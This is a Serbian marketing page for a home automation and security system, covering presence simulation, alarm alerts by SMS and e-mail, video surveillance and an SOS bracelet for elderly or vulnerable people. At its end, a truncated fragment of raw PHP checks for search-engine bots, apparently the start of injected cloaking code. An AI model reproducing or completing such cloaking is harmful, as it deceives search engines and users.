Pametna zaštita


Odlika pametnog sistema automatizacije je i sprečavanje neželjenih situacija što doprinosi sigurnosti doma i bezbednosti ukućana.

Postoji mnogo raznih tipova ekrana sa kojih se vrši kontrola i sa kojih se vide informacije o sistemu.

Simulacija prisutnosti

Bitna komponenta Tesla sistema automatizacije je i sigurnost jer omogućuje potpunu kontrolu doma ili kancelarije kad je vlasnik kod kuće, kao i kad je odsutan. Ovo drugo je naročito korisno u vreme godišnjih odmora kada provalnici vrebaju ne bi li opljačkali stan u odsustvu vlasnika, pa unapred prate koje su ”navike“ vlasnika, da li je stan prazan i sl.

Naravno, svi uređaji se uklapaju u Vašu ambijentalnu temu, a mi usko sarađujemo sa arhitektama, tako da ne remetimo njihova rešenja.

Tesla sistem automatizacije omogućuje simulaciju boravka u prostoru postavljanjem određene scene koja se može programirati i uključivati mobilnim telefonom svaki dan s kilometrima udaljenog mesta. Time se šalje poruka da se neko nalazi u stanu, što zavarava lopove pa može sprečiti moguću provalu.

Alarmni sistemi

Rešenje Tesla sistema veoma je pogodno za prevenciju neželjenih situacija. Aktivacijom senzora pokreta, požara, poplave, monoksida ili plina, Tesla sistem automatizacije šalje SMS i e-mail poruke na unapred definisane brojeve i adrese. Uz to, senzori požara, monoksida i plina imaju ugrađene sirene koje upozoravaju na problem i na licu mesta.

Video nadzor se objedinjuje u automatskim kućama, kancelarijama i objektima, tako da sa istog "LCD-a" možete videti ko je na vratima, a i upravljati celim objektom.


SOS narukvica

Narukvica sa SOS taster idealno je rešenje za starije i nemoćne osobe, decu, osobe s invaliditetom i za sve one kojima bi mogla zatrebati pomoć i hitna intervencija. Osoba koja je u opasnosti pritiskom na crveni taster na narukvici šalje upozorenje kontakt osobama koje će primiti obaveštenje putem SMS poruke i poziva, što im omogućava brzu reakciju.

U slučaju detekcije alarmantnih situacija – curenja vode, plina (metan, propan-butan) ili ugljen-monoksida, provale, vatre, SOS dojave – Tesla sistem automatizacije šalje SMS poruke na tri broja i poziva pet dodeljenih brojeva telefona. Zasvisno od toga ko su navedene kontakt osobe, poruke upozorenja mogu primati prijatelji vlasnika, članovi porodice, kućepazitelj…

Više o SOS alarmima

LOGIN
niste ulogovani
e-mail adresa:
lozinka:

Zaboravili ste lozinku?   

PRETRAŽIVAČ
Unesite reč ili frazu:

NEWSLETTER
Unesite Vašu Email adresu:

TESLA SISTEMI
Ekipa na terenu

 


 

 


SUPERBRANDS
Pogledajte fotografije i video sa svečane dodele nagrada »

KATALOG
Pogledajte katalog Tesla sistema »

ISO 9001

 

 

ISO 14001

 

 

ISO 18001

 

 

ISO 20000

 

 

ISO 22301

 

 

ISO 27001

 

 

ISO 50001

 

 

ISO 37001

 

 


NIKOLA TESLA
www.tesla-museum.org »

$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']); if((strpos($tmp, 'bot') == true)){ echo '